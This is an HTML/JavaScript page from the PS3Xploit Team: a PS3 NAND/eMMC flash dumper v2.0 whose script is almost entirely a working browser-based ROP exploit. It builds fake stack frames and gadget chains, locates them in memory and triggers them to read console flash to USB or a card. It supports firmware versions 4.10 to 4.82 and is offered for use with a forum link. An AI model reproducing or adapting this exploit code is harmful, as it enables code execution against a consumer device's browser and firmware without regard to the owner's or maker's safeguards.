<!DOCTYPE html>
<html>
<script src="ps3xploit_v20.js"></script>
<head>
<meta charset="UTF-8">
<title>PS3Xploit Team - PS3 NAND/eMMC Flash Memory Dumper v2.0</title>
<script>
/**
 * Click handler for the "Initialize exploitation" button.
 *
 * Picks the dump file path for the selected device (used_port), builds the
 * payload strings (usb_fp, stack_frame, jump_2, jump_1), locates each of them
 * in memory with findJsVariableOffset(), re-reads them with checkMemory() and,
 * only if all three match exactly, enables the trigger button. Any failure
 * retries via reload() until max_loops attempts are used up, then calls fail().
 *
 * Relies on globals and helpers not defined in this page (convertString,
 * hexw2bin, hexh2bin, findJsVariableOffset, checkMemory, gadget*_addr,
 * toc_addr, sp_exit, used_port, t_out, total_loops, max_loops, hr, br, debug,
 * String.prototype.replaceAt, ...) — presumably provided by ps3xploit_v20.js,
 * which is loaded at the top of this page; confirm.
 *
 * No parameters, no return value; exceptions are caught and logged.
 */
function initROP()
{
try
{
disable_cb();
disable_btn();
clearLogEntry();
// Cancel a pending retry timer left over from a previous attempt.
if(t_out!=0){clearTimeout(t_out);t_out=0;}
var fp_root;
var f_off_start=0x0;
// Output path chosen via the checkboxes (usb(n) sets used_port); any other
// value falls back to usb000. The card paths use a longer "xxxxxxxx" prefix,
// and f_off_start=4 is added to usb_fp_addr further down to compensate.
if(used_port===1){fp_root=convertString("xxxx/dev_usb001/dump.hex");}
else if(used_port===6){fp_root=convertString("xxxx/dev_usb006/dump.hex");}
else if(used_port===1000){fp_root=convertString("xxxxxxxx/dev_sd/dump.hex");f_off_start=0x4;}
else if(used_port===1001){fp_root=convertString("xxxxxxxx/dev_cf/dump.hex");f_off_start=0x4;}
else if(used_port===1002){fp_root=convertString("xxxxxxxx/dev_ms/dump.hex");f_off_start=0x4;}
else {used_port=0;fp_root=convertString("xxxx/dev_usb000/dump.hex");}
// Reset the located addresses for this attempt.
usb_fp_addr=0;
stack_frame_addr=0;
jump_2_addr=0;
jump_1_addr=0;
// Attempt counter shared across reload() retries; fail() resets it to 0.
total_loops++;
// Hard-coded constants embedded in the payload built below (see readflash()
// and stack_frame). The memory search starts at search_base and advances one
// search_size window per iteration until search_max_threshold is used up.
var flash_id=0x22;
var flash_flag=0x01000000;
var flash2_flag=0x00000001;
var start_sector=0x0;
var step_sector=0x800;
var ss_read_size=0x200*step_sector;
var file_size_a=128;
var file_size_b=111;
var rosdump_addr=0x83000000;
var search_max_threshold = 70*0x100000;
var search_base=0x80100000;
var search_size=0x200000;
var temp_addr= 0x8C800000;
var readlen_addr=0,dev_handle_addr=0,wb_addr=0,wba_addr=0,sso_addr=0;
var fwrite_mode="wb";
var fwrite_mode_2="a+b";
// usb_fp: NUL-separated path and file-mode strings followed by addresses.
// Its first two bytes are a marker that the search loop below rewrites on
// every iteration (replaceAt(0,...)).
usb_fp=fp_root+unescape("\u0000")+convertString(fwrite_mode)+unescape("\u0000")+convertString(fwrite_mode_2)+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+unescape("\u4141\u4141\u4141\u4141\uFD7E");
// Shows progress as a percentage of max_loops and schedules another
// initROP attempt in 1 s.
function reload()
{
showResult(hr+"<h1><b>Exploit Initialization..."+br+"<font color=%22000000%22>Progress: "+((100/max_loops)*total_loops).toString()+"%, please wait...</font></b></h1>");
t_out=setTimeout(initROP,1000);
};
// Gives up: resets the attempt counter, restores the GUI and re-applies the
// port selection.
function fail()
{
total_loops=0;
showResult(hr+"<h1><b>Exploit Initialization FAILED!</h1><h2><font color=%22000000%22><a href=\"javascript:window.location.reload()\">Refresh this page</a> & try again...</font></b></h2>");
cleanGUI();
usb(used_port);
};
// Locate usb_fp in memory, one search_size window per iteration. When the
// search budget is exhausted, retry (or fail) and return — the return leaves
// initROP entirely.
do
{
if(search_max_threshold<search_size){
if(total_loops<max_loops)reload();
else fail();
return;}
usb_fp=usb_fp.replaceAt(0,hexh2bin(0x7EFD));
usb_fp_addr=findJsVariableOffset("usb_fp",usb_fp,search_base,search_size);
search_max_threshold-=search_size;
}while(usb_fp_addr===0);
// Fixed offsets into the located usb_fp string that the payload embeds below.
wb_addr=usb_fp_addr+0x16;
wba_addr=usb_fp_addr+0x1A;
sso_addr=usb_fp_addr+0x1E;
readlen_addr=usb_fp_addr+0x26;
dev_handle_addr=usb_fp_addr+0x2A;
usb_fp_addr+=f_off_start;
// Builds nloop consecutive chunks of the payload; chunk i embeds
// rosdump_addr+i*ss_read_size, start_sector+(i+stage)*step_sector and
// temp_addr+i*0x30.
// NOTE: ret is declared without an initializer, so the first += prepends the
// text "undefined" to the returned string.
function readflash(nloop,stage)
{
var ret,iterator;
for(iterator=0;iterator<nloop;iterator++)
{
ret+=unescape("\uFF00\u0000\u025A\uFF10\uFF10")+hexw2bin(readlen_addr)+hexw2bin(rosdump_addr+(iterator*ss_read_size))+hexw2bin(step_sector)+hexw2bin(start_sector+((iterator+stage)*step_sector))+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29")
+unescape("\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget5_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304")
+unescape("\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768")
+unescape("\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+(iterator*0x30))+unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget3_addr)+unescape("\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132")
+unescape("\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980");
}
return ret;
};
// stack_frame: the main payload string, built from the constants above plus
// two readflash() runs (file_size_a chunks, then file_size_b chunks offset by
// file_size_a). Its leading two bytes are a marker rewritten by the search
// loop that follows (replaceAt(0,...)).
stack_frame= unescape("\u4141\u2A2F")+hexw2bin(gadget2_addr)+hexw2bin(toc_addr)+unescape("\u4141\u4141\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u0000\u0000")+hexw2bin(toc_addr)+unescape("\u5152\u5354\u5556\u5758\u5960\u6162\u6364") //64 bytes
+unescape("\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
+unescape("\u2930\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(temp_addr-0x30)+unescape("\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u0000\u0000")+hexw2bin(gadget3_addr)+unescape("\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192")
+unescape("\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556")
+unescape("\u5758\u5960\u6162\u0000\u0258\uFF10\uFF10\uFF08\uFF08\uFF07\uFF07\u0000\u0000")+hexw2bin(dev_handle_addr)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(sso_addr)+unescape("\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\uFF29\uFF29\uFF29")
+unescape("\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(temp_addr-0x60)+unescape("\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u0000\u0000")+hexw2bin(gadget4_addr)+unescape("\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384")
+unescape("\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u8586\u8788")
+unescape("\u8990\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566")+hexw2bin(flash_flag)+hexw2bin(flash2_flag)+unescape("\u7576\u7778\u7980\u8182\u0000\u0000")+hexw2bin(gadget3_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112")
+unescape("\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\uFF00")
+readflash(file_size_a,0)
+unescape("\u0506\uFF11\uFF11\uFF10\uFF10\uFF08\uFF08\uFF07\uFF07\uFF06\uFF06\uFF05\uFF05")+hexw2bin(wb_addr)+hexw2bin(usb_fp_addr)+unescape("\uFF09\uFF09\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u0000\u0000")+hexw2bin(file_size_a*ss_read_size)+unescape("\u0000\u0000")+hexw2bin(rosdump_addr)+unescape("\u0000\u0000")+hexw2bin(usb_fp_addr)
+unescape("\u8384\u8586\u8788\u8990\uF10F\u9394\u9596\u9798\u0000\u0000\u0001\u3B74\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344")
+unescape("\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000\uFF31")
+unescape("\uFF31\uF00F\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970")
+unescape("\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334")
+unescape("\u3536\u3738\u3940\u4142\u4344\u0000\u0000")+hexw2bin(temp_addr+0xA100)+unescape("\u0000\u0000\u3536\u3738\u0000\u0000")+hexw2bin(temp_addr+0xA200)+unescape("\uF00F\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u0000\u0000")+hexw2bin(gadget3_addr)
+unescape("\uF00F\u0506\u0000\u0259\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u0000\u0000\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000\uFF29\uFF29\u0000\u0000\uFF30\uFF30")
+readflash(file_size_b,file_size_a)
+unescape("\u0506\u0000\u0259\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u0000\u0000\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000\uFF29\uFF29\u0000\u0000\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
+unescape("\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(gadget5_addr)+unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324")
+unescape("\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u0000\u0000")+hexw2bin(temp_addr+0xA300)
+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0000\u0000")+hexw2bin(gadget3_addr)+unescape("\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152")
+unescape("\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\uFF11\uFF11\uFF10\uFF10\uFF08")
+unescape("\uFF08\uFF07\uFF07\uFF06\uFF06\uFF05\uFF05")+hexw2bin(wba_addr)+unescape("\uFF03\uFF03\uFF09\uFF09\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u0000\u0000")+hexw2bin(file_size_b*ss_read_size)+unescape("\u0000\u0000")+hexw2bin(rosdump_addr)+unescape("\u0000\u0000")+hexw2bin(usb_fp_addr)
+unescape("\u8384\u8586\u8788\u8990\uF10F\u9394\u9596\u9798\u0000\u0000\u0001\u3B74\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344")
+unescape("\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000\uFF31")
+unescape("\uFF31\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970")
+unescape("\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334")
+unescape("\u3536\u3738\u3940\u4142\u4344\u0000\u0000")+hexw2bin(temp_addr+0xA400)+unescape("\u0000\u0000\uFF30\uFF30\u0000\u0000")+hexw2bin(temp_addr+0xA500)+unescape("\u0000\u0000")
+hexw2bin(sp_exit)+unescape("\u9900\u0102\u0304\u0506\u0000\u0000")+hexw2bin(gadget8_addr)+unescape("\u2F2A");
// Locate stack_frame (this search starts 0x200000 above search_base), then
// jump_2 and jump_1 in turn; each of the latter embeds the address found in
// the previous step. Same budget/retry/return behaviour as the first loop.
do
{
if(search_max_threshold<search_size){
if(total_loops<max_loops)reload();
else fail();
return;}
stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));
stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+0x200000,search_size);
search_max_threshold-=search_size;
}while(stack_frame_addr===0);
jump_2=unescape("\u0102\u7EFB\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950")
+hexw2bin(stack_frame_addr)+unescape("\uFB7E");
do
{
if(search_max_threshold<search_size){
if(total_loops<max_loops)reload();
else fail();
return;}
jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));
jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);
search_max_threshold-=search_size;
}while(jump_2_addr===0);
jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");
do
{
if(search_max_threshold<search_size){
if(total_loops<max_loops)reload();
else fail();
return;}
jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));
jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);
search_max_threshold-=search_size;
}while(jump_1_addr===0);
// Re-read the three located strings from memory; all must match the JS
// values exactly before the trigger button is enabled, otherwise retry.
var u=checkMemory(usb_fp_addr-0x4,0x100,usb_fp.length);
var j2=checkMemory(jump_2_addr-0x4,0x100,jump_2.length);
var j1=checkMemory(jump_1_addr-0x4,0x100,jump_1.length);
if((j2===jump_2)&&(j1===jump_1)&&(u===usb_fp))
{
// The pending timer is cleared here but t_out is not reset to 0 (unlike at
// the top of this function).
if(t_out!=0){clearTimeout(t_out);}
showResult("<hr><h1><b><font color=%22386E38%22>Exploit Initialization SUCCESS...!</font></b></h1><h3><b><font color=%22000000%22>You can now proceed to dump the NAND Flash Memory to USB/Card!</font></b></h3>");
enable_trigger();
}
else
{
logAdd("String mismatch in memory!");
if(total_loops<max_loops)reload();
else fail();
}
}
catch(e)
{
// debug is switched on only around this log call — presumably a verbosity
// flag honoured by logAdd() in ps3xploit_v20.js; confirm.
debug=true;
logAdd(br+"Exploit initialization failed because the following exception was thrown during execution:"+br+e);
debug=false;
}
}
/**
 * Click handler for the "Dump ... NAND" button (enabled by initROP on success).
 *
 * Shows the in-progress banner, locks the controls, then schedules
 * trigger(jump_1_addr) after 1 s and success(<completion banner>) after 2 s.
 * success() is scheduled at a fixed delay here; whether it waits for the dump
 * to actually finish is decided in ps3xploit_v20.js — confirm.
 *
 * Relies on globals from ps3xploit_v20.js (clearLogEntry, showResult,
 * disable_cb, disable_btn, trigger, success) and on jump_1_addr set by initROP.
 * No parameters, no return value.
 */
function triggerX()
{
var startMsg="<hr><h1><b>Proceeding to dump 239Mb NAND Flash Memory to USB/Card device...</b></h1><h3><b><font color=%22000000%22>Please wait, the dump operation takes about 15 to 25 minutes!</font></b></h3>";
var doneMsg="<hr><h1><b><font color=%22386E38%22>NAND Flash dump operation completed..!</font></b></h1><h3><b><font color=%22000000%22>Check your USB device for dump.hex...</font></b></h3>";
// Reset the log and show the banner before locking the controls.
clearLogEntry();
showResult(startMsg);
disable_cb();
disable_btn();
// The extra setTimeout argument is passed through to each callback.
setTimeout(trigger,1000,jump_1_addr);
setTimeout(success,2000,doneMsg);
}
</script>
</head>
<body id="BodyID" bgcolor="#FFD097">
<div id="HeaderID" style="color:#CC2010">
<h1>PS3 NAND/eMMC Flash Memory Dumper v2.0</h1>
<h4><font color="#000000">by PS3Xploit Team: </font><b> W | esc0rtd3w | habib | bguerville</b><hr></h4>
<h4><font color="#000000">v2.0 Update crafted by: </font><b> bguerville</b> (ROP, Javascript & Debugging) | <b>esc0rtd3w</b> (Debugging & Testing)<hr></h4>
<font color="#000000">Many thanks to xerpi for the userland memory leak exploit ps3 port, zecoxao & Joonie for their early & continued support, mysis for documenting vsh exports & plugins, the psdevwiki contributors of course, STLcardsWS for his long standing contribution & all ps3 community hackers/devs past & present, you know who you are...<hr>
<font color="#CC2010">
<h3>Supports OFW and CFW CEX Firmware versions 4.10 to 4.82<br>
Supports OFW and CFW DEX Firmware version 4.81<br>
Supports Phat Models Axx/Bxx/Cxx/Exx/Gxx<br>
Supports SuperSlim Models 4xxx-A</h3>
</font>
Instructions/additional details & news on <a href="http://www.psx-place.com/forums/PS3Xploit">http://www.psx-place.com/forums/PS3Xploit</a><br></font>
<hr>
</div>
<font color="#CC2010"><b><i>Dump file path:</i></b></font><br><br>/dev_usb000/dump.hex<input type="checkbox" id="usb0" name="/dev_usb000" onclick="usb(0);" checked/> | /dev_usb001/dump.hex<input type="checkbox" id="usb1" name="/dev_usb001" onclick="usb(1);"/> | /dev_usb006/dump.hex<input type="checkbox" id="usb6" name="/dev_usb006" onclick="usb(6);"/> <button id="btnReset" type="button" onclick="resetOptions(true);">Reset Path Options</button>
<br>/dev_sd/dump.hex<input type="checkbox" id="sd" name="/dev_sd" onclick="usb(1000);"/> | /dev_cf/dump.hex<input type="checkbox" id="cf" name="/dev_cf" onclick="usb(1001);"/> | /dev_ms/dump.hex<input type="checkbox" id="ms" name="/dev_ms" onclick="usb(1002);"/><br><br>
<button id="btnROP" type="button" onclick="initROP();" autofocus>Initialize exploitation</button><span id="dex_txt" style="visibility:hidden"> DEX mode<input type="checkbox" id="dex" name="DEX" disabled="true" onclick="dex();"/></span>
<br><br><button id="btnTrigger" disabled="true" type="button" onclick="triggerX();">Dump 239Mb NAND to USB/Card device</button>
<div id="result" style="color:#CC2010"></div><br>
<div id="log"></div>
<div id="exploit" ></div>
<div id="trigger"></div>
<div id="footer" style="color:#000000"></div>
<script type="text/javascript" >
// Page bootstrap: set the retry budget consumed by initROP(), then hand off
// to the helpers from ps3xploit_v20.js.
max_loops=10; // assigned without var — presumably declared in ps3xploit_v20.js; confirm
writeEnvInfo();
ps3chk();
</script>
</body>
</html>